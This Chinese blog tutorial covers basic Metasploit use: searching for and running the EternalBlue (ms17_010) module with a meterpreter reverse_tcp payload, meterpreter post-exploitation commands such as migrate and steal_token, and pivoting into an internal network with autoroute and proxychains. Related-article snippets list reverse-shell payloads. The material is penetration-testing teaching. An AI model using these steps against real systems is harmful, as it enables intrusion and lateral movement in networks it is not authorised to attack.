msf使用基础

最新推荐文章于 2024-05-19 19:42:57 发布
最新推荐文章于 2024-05-19 19:42:57 发布
阅读量626 收藏 4
点赞数 1
分类专栏: 内网安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46804551/article/details/116381087
版权

前言

msf是后渗透神奇,在kali中已经内置有。

1.1 基础使用
metasploit程序需要使用postgresql数据库

手动启动数据库:

service postgresql start

设置成开机启动数据库:

systemctl enable postgresql

启动msf

msfconsole

1.2.查找模块

search 模块名
//比如我要找永恒之蓝 search ms17_010

在这里插入图片描述
使用那个模块 use 模块名或use 前面的数字都可以
在这里插入图片描述在这里插入图片描述
1.3使用模块

#查看要设置的参数
show options
#查看模块详情
info
#设置载荷  有很多可以自行选择
 set payload windows/x64/meterpreter/reverse_tcp

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

#运行模块
run 或者 exploit

在这里插入图片描述
在这里插入图片描述
1.4.命令行模式的一些基础操作
输入help可以查看支持的操作,但是乱码了,莫慌,可以解决。
在这里插入图片描述
输入 chcp 65001
在这里插入图片描述
乱码没有了

核心后台脚本:

​		bgkill       关闭一个后台的meterpreter脚本

​		bglist	   列出所有正在运行的后台脚本

​		bgrun	   将一个meterpreter脚本以后台线程模式运行

​		channel   显示或者控制一个活动频道

​		close 		关闭一个频道

​		exit			终止meterpreter会话

​		get_timeouts	获得当前会话的timeout值

		getuid			查看当前权限

​		help			帮助菜单

​		info 			显示post模块信息

​		irb				进入ruby脚本模式

​		load			加载meterpreter扩展

​		migrate	   将会话迁移到一个指定PID的进程

​		quit			 结束meterpreter会话

​		read			从频道中读取数据

​		resource	运行文件中的命令

​		run 			执行一个meterpreter脚本或者post模块

​		sessions    快速地切换到另一个会话

​		background	切换到后台

		run checkvm  查看是否是虚拟机

		steal_token 伪造身份

伪造身份:
在这里插入图片描述
2.1实战演示

在这里插入图片描述

  • 通过永恒之蓝拿到跳板机
    在这里插入图片描述
  • 拿到跳板机之后添加路由
    在这里插入图片描述
添加攻击IP添加到目标机路由表中

也可以 run autoroute -s 10.10.10.0/24

或者手动添加

route add 10.10.10.0 255.255.255.0
  • 接下来设置代理
    在这里插入图片描述

接下来用kali上的神奇proxychains

vi /etc/proxychains.conf

在这里插入图片描述
测试是否能连内网的机器
在这里插入图片描述
可以成功连接
通过代理工具开启msf
在这里插入图片描述
接下来就可以直接搞内网了。实战中可能有多层网段。就需要挂多层代理

msf中有很多 攻击载荷模块,嗅探模块和后渗透模块。大家后期可以深入的去研究研究。

. iDea.
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MSF使用教程
huangyongkang666的博客
03-26 9664
MSF使用教程 1.简介 ​ Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。 2.MSF模块介绍 1.辅助模块 auxiliary 负责执行信息收集、扫描、嗅探、指纹识别、口令猜测和Dos攻击等功能 2.渗透攻击模块exploits 利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法(主动、被动) ​ 主动渗透攻击:发送网络数据,触发安全漏洞。比如web应用程序渗透攻击、SCADA工业控制系
【常用工具】MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)
热门推荐
Fighting_hawk的博客
03-27 2万+
1. 了解MSF框架的使用方法。 2. 了解永恒之蓝漏洞。
MSF基础与应用-
最新发布
qq_53058639的博客
05-19 1005
MSF推荐通过控制台接口使用,打开Kali终端,输入msfconsole就能够进入到控制台操作界面msfconsole在这里插入图片描述。
msf基本使用,基本命令说明
cjh12340826的博客
07-10 2303
xxx_nonx_tcp : no execute 或 win7 (NX是应用在cpu的一种可以防止缓冲区溢出的技术)shell_reverse_tcp:反向连接到攻击者主机并创建一个shell。reverse_http: 通过HTTP隧道通信并创建一个新用户添加到管理组。shell_find_tag: 在已建立的连接上创建一个shell。add_user :创建一个新用户添加到管理组。bind_tcp : 监听一个tcp连接。21,version显示一个控制台版本。7,info 显示一个模块的详细信息。
MSF使用详解
m0_52051132的博客
10-19 7897
一、 Meterpreter是什么Meterpreter是Metasploit框架中的一个利器,作为漏洞溢出后的攻击载荷使用,攻击载荷在触发漏洞后会返回一个由我们控制的通道,可用于远程执行命令!Metasploit提供了各个主流平台的Meterpreter版本,包括Windows、Linux,同时支持x86、x64平台,另外,Meterpreter还提供了基于PHP和Java语言的实现。Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。
MSF中sessions命令使用
qq_44624916的博客
11-28 5174
MSF使用
msf简单运用基础
12-16
msf简单运用基础篇,一步一步慢慢来。努力加油
基础电子中的MSF业务框架与IMS的关系
11-14
MSF和36PP对于在下一代网络中快速有效地进行新业务开发的需求认识是一致的,因此,MSF的业务框架和36PP IMS的业务平台之间必然存在着紧密的关系。通过对MSF业务框架和IMS业务平台的分析,可以看出MSF中的业务代理...
如何更新msf及其结构
10-08
在网络安全领域,Metasploit框架(简称MSF)是一款广泛使用的开源工具,用于开发、测试和执行安全漏洞的exploits。Metasploit是一个强大的平台,允许安全研究人员和渗透测试人员利用已知漏洞进行安全评估。为了保持...
MSF组队模型v.3.1
02-27
本页内容介绍组队模型基础原理MSF基础原理关键概念成功的做法组队模型概述组队模型角色群产品管理角色群开发角色群测试角色群用户经验角色群发布管理角色群按比例缩放组队模型逐步升级与责任性小结介绍为了在整个IT...
MSF使用1
xhscxj的博客
06-12 3414
进入kali中文件,将原有的源注释掉,换上清华的源 进行更新msf:辅助模块,辅助渗透(端口扫描、登录密码爆破、漏洞验证等) :漏洞利用模块,包含主流的漏洞利用脚本,通常是对某些可能存在漏洞的目标进行漏洞利用。命名规则:操作系统/各种应用协议分类 :攻击载荷,主要是攻击成功后在目标机器执行的代码,比如反弹shell的代码 :后渗透阶段模块,漏洞利用成功获得meterpreter之后,向目标发送的一些功能性指令,如:提权等 :编码器模块,主要包含各种编码工具,对payload进行编码加密,以便绕过入侵检测和过
渗透工具MSF系列培训教程(共17课)10-17课
06-20
第1课:什么是Metasploit 第2课:如何安装Metasploit 第3课:如何更新MSF及其结构 第4课:msf用户接口及核心命令 第5课:Exploits模块 第6课:payloads模块 第7课:利用MSF攻击windows 第8课:三个模块作用 第9课:msfcli命令接口 第10课:msfweb命令接口 第11课:msfd命令接口 第12课:msfpayload和msfencode接口 第13课:MSF数据库后台命令 第14课:autopwn命令 第15课:meterpreter plyload 第16课:vncinject payload 第17课:MSF实战应用演示
Metasploit中文使用教程
04-18
Metasploit中文使用教程,演示了一个完整的攻击实例
内网渗透工具MSF使用教程
CC__Faker的博客
04-01 2640
MSF介绍 Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 常见指令 use[exploits/payloads/auxiliary] //指定一个模块并使其开始工作 show[exploits/payloads/auxiliary/options] //显
MSF基本使用
浅笑996的博客
11-10 2620
MSF 链接数据库 linux查找文件 find / -name dabase.yml 链接数据库 db_connect -y path/database.yml db_status 查询数据库链接状态 payload: windows/x64/meterpreter/reverse_tcp 命令 (以下命令基于这个payload) background 后台 sessions...
Msf 基本用法
freshfox的博客
02-28 591
Msf 基本用法 Msfconsole Help nmap -sn 192.168.208.0/24主机发现 渗透攻击过程需要xp用户登录系统后才可以利用成功。 1.search MS08-0672. use exploit/windows/smb/ms08_067_netapi use exploit/windows/smb...
Metasploit用户接口(MSF终端、MSF命令行、Armitage)
WEL测试
08-29 5905
2.2Metasploit用户接口          Metasploit软件为它基础功能提供了多个用户接口,包括终端、命令行、图像化界面等。除了这些接口,功能程序(utilities)则提供了对Metasploit框架中内部功能的直接访问。 2.2.1 MSF终端          MSF终端(msfconsole)是目前Metasploit框架最为流行的用户接口,而且MSF终端是Met
用meterpreter实现跳板机
weixin_30895603的博客
03-08 352
meterpreter跳板机 背景:渗透测试者A拿到了B主机的控制权,但没有拿到ssh密码(不能打ssh隧道)。现需横向移动渗透内网主机C,为了避免动作过大不便直接在B上对C进行渗透,其中C不能出公网。现需让B转发A到C的流量,并最终使C反弹shell至A。 方案:使用meterpreter来“打路由”或者做端口映射两种方案 工作原理: 打路由...
msfencode的基本使用
KD的疯狂实验室
07-22 1715
简单介绍一下msfencode的使用
Web渗透面试面试集锦.docx
12-14
在Web渗透测试面试集锦中,主要关注两个核心部分:MSF(Metasploit Framework)和Burp Suite的使用,以及渗透测试中的信息收集与漏洞扫描策略。 1. MSF与Burp Suite相关问题: - Burp Suite 是一款强大的Web应用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值